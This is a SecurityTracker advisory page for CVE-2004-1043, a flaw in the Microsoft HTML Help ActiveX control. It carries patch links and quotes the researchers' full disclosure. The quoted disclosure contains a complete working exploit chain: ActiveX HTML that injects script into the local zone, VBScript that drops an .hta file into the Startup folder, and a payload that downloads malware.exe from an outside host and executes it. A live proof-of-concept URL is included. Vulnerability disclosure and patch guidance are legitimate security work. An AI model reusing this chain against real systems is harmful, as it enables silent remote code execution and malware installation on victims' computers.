SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Microsoft HTML Help Vendors:   Microsoft
Microsoft HTML Help Active Control Cross-Domain Error Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1012836
SecurityTracker URL:  http://securitytracker.com/id/1012836
CVE Reference:   CVE-2004-1043   (Links to External Site)
Date:  Jan 11 2005
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): XP SP2 is affected
Description:   A vulnerability was reported in Microsoft's HTML Help ActiveX control. A remote user can obtain information from the target system or execute arbitrary code on the target system.

Paul from Greyhats reported a cross-domain vulnerability in 'hhctrl.ocx'. A remote user can create specially crafted HTML that, when loaded by the target user, will invoke a command via the ActiveX control to open a help popup window in the local zone and then inject scripting code into that window. The scripting code will run in the Local Machine zone, which allows arbitrary commands to be executed with the privileges of the target user.

[Editor's note: The exploit was originally described as leveraging existing vulnerabilities, but CVE has assigned this a separate identifier.]

Impact:   A remote user can execute arbitrary code in the Local Machine zone.
Solution:   Microsoft has issued the following fixes.

Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4:

http://www.microsoft.com/downloads/details.aspx?FamilyId=BE1B11C0-EF09-4295-8FB2-0FF17BA65460

Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2:

http://www.microsoft.com/downloads/details.aspx?FamilyId=43201B00-298D-4C0C-A26F-AAEDF163FEB7

Microsoft Windows XP 64-Bit Edition Service Pack 1:

http://www.microsoft.com/downloads/details.aspx?FamilyId=1FC58C5F-3A97-4B89-96C3-AAEFFCE28535

Microsoft Windows XP 64-Bit Edition Version 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyId=3B3878C9-57FB-45A9-B5C2-234AD538D6CC

Microsoft Windows Server 2003:

http://www.microsoft.com/downloads/details.aspx?FamilyId=23E619FE-F6DB-4666-A247-339F55B059CC

Microsoft Windows Server 2003 64-Bit Edition:

http://www.microsoft.com/downloads/details.aspx?FamilyId=3B3878C9-57FB-45A9-B5C2-234AD538D6CC

A restart may be required.

Vendor URL:  www.microsoft.com/technet/security/bulletin/ms05-001.mspx (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  Microsoft Internet Explorer SP2 Fully Automated Remote Compromise




Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

Dec, 21 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Pro SP2
- Microsoft Windows XP Home SP2


Not Tested
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x
- Microsoft Windows 2003 Server

 

Severity
---------
Critical - Remote code execution, no user intervention


Intro
------
Although hundreds of millions of dollars have been spent on securing SP2, perfection is impossible. Through the joint effort of Michael
 Evanchik (http://www.michaelevanchik.com) and Paul from Greyhats Security (http://greyhats.cjb.net), a very critical vulnerability
 has been developed that can compromise a user's system without the need for user interaction besides visiting the malicious page.
 The vulnerability is not actually a vulnerability in itself, but rather it is uses multiple known holes in SP2 including Help ActiveX
 Control Related Topics Zone Security Bypass Vulnerability and Help ActiveX Control Related Topics Cross Site Scripting Vulnerability.
 


Tech Stuff and Explanation
--------------------------

1. Create a webpage with the following code:

sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
&lt;/OBJECT&gt;

&lt;OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"&lt;script language=\\\"vbscript\\\" src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")
'>
&lt;/OBJECT&gt;

&lt;script&gt;
localpage.HHClick();
setTimeout("inject.HHClick()",100);
&lt;/script&gt;
---------------------------------------------------------------------

Explanation of above code:
The first object (id: localpage) tells hhctrl.ocx to open a help popup window to the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.
 This file was chosen because it is treated as the local zone and it doesn't have any script to mess us up. On some computers an error
 is shown before the popup. This is the user's only chance to prevent the vulnerability from working. If the user were to force his
 computer to shut down at this point, the user would be unaffected by the exploit.

The second object (id: inject) tells the help popup to navigate to a javascript protocol, which executes. Thus, cross site scripting
 has just taken place. A script tag that uses a remote file is written to the page, and writehta.txt (below) is executed in the unsecured
 local zone.

In the script, HHClick is able to be used to automate the vulnerability. This is more effective than the previously described method
 of requiring a user to click on a button.


2. Writehta.txt uses adodb recordset to write Microsoft Office.hta to the user's startup folder. See Michael Evanchik's analysis of
 the drag and drop vulnerability for an explanation on adodb recordset.

writehta.txt
---------------------------------------------------------------------
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------


3. f00bar.txt (thanks malware for hosting this file) is the file requested by the adodb recordset (again, read the drag and drop analysis
 at www.michaelevanchik.com for an explanation on how this works and why the the f00bar.txt looks like it does). Because there is
 absolutely no limit on what you can do in an hta file, an old, yet effective method of requesting and saving a file to the user's
 hd is used. From that, a wscript shell is created and used to run the program. And now, ladies and gentlemen, we have compromised
 the user's machine.

f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"&lt;script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""&lt;/script&gt; crap="""
---------------------------------------------------------------------


 do not (according to Michael Evanchik)


Proof of Concept?
------------------
- http://freehost07.websamba.com/greyhats/sp2rc.htm

- If an error is shown, press OK. This is normal.

- Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download and launch a harmless executable
 (which includes a pretty neat fire animation) 

 

Vendor Recommendations
----------------------
- Like Michael Evanchik said in his previous analysis, Microsoft needs to apply XP Service Pack 2's local zone lockdown to .HTA files
 as well.

- This might be a little farfetched, but it would solve a lot of problems: Take out the startup folder and only support running files
 during startup through the registry. The startup folder is a major part of this vulnerability and I can almost gaurantee it will
 be used for another remote compromise.

- Microsoft could possibly take HTA files out altogether. I have not seen them used for anything beyond hacking.

- No vulnerability is too small or too insignificant to be taken seriously. Treat every vulnerability as if it could be dangerous.
 

 

User Recommendations
---------------------
- Disable hta files.
- Get yourself antivirus software. I recommend symantic because once they get their lazy asses off the couch and fix some of this
 stuff you will be a lot better off.
- Disable active scripting in Internet Explorer. If nothing else, do this.
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox  www.mozilla.org)

 

Credit
------
Paul from Greyhats
Michael Evanchik
Http equiv (thanks for allowing me to use your server for f00bar.txt)


Greets
------
- Liu Die Yu (all the work you've done is amazing)


Contact
-------
paul@greyhats.cjb.net
http://greyhats.cjb.net
http://michaelevanchik.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC